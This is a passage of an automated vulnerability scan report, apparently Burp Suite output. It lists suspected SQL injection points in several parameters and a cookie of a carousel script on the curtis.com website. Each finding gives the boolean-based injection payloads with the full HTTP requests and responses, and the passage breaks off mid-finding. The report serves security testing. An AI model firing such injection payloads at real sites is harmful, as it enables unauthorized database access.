1.44. http://www.curtis.com/scripts/carousel/getimages.cfm [sifrFetch cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 87614863'%20or%201%3d1--%20 and 87614863'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d1--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Wed, 21-Apr-2010 12:09:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d2--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.45. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_buttons parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The slide_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11199147'%20or%201%3d1--%20 and 11199147'%20or%201%3d2--%20 were each submitted in the slide_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d1--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d2--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.46. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_captions parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The slide_captions parameter appears to be vulnerable to SQL injection attacks. The payloads 15534429'%20or%201%3d1--%20 and 15534429'%20or%201%3d2--%20 were each submitted in the slide_captions parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d1--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d2--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.47. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_directory parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The slide_directory parameter appears to be vulnerable to SQL injection attacks. The payloads 12403700'%20or%201%3d1--%20 and 12403700'%20or%201%3d2--%20 were each submitted in the slide_directory parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d1--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d2--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.48. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_links parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The slide_links parameter appears to be vulnerable to SQL injection attacks. The payloads 79799331'%20or%201%3d1--%20 and 79799331'%20or%201%3d2--%20 were each submitted in the slide_links parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d1--%20&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d2--%20&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.49. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_number_display parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The slide_number_display parameter appears to be vulnerable to SQL injection attacks. The payloads 16437454'%20or%201%3d1--%20 and 16437454'%20or%201%3d2--%20 were each submitted in the slide_number_display parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d1--%20&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
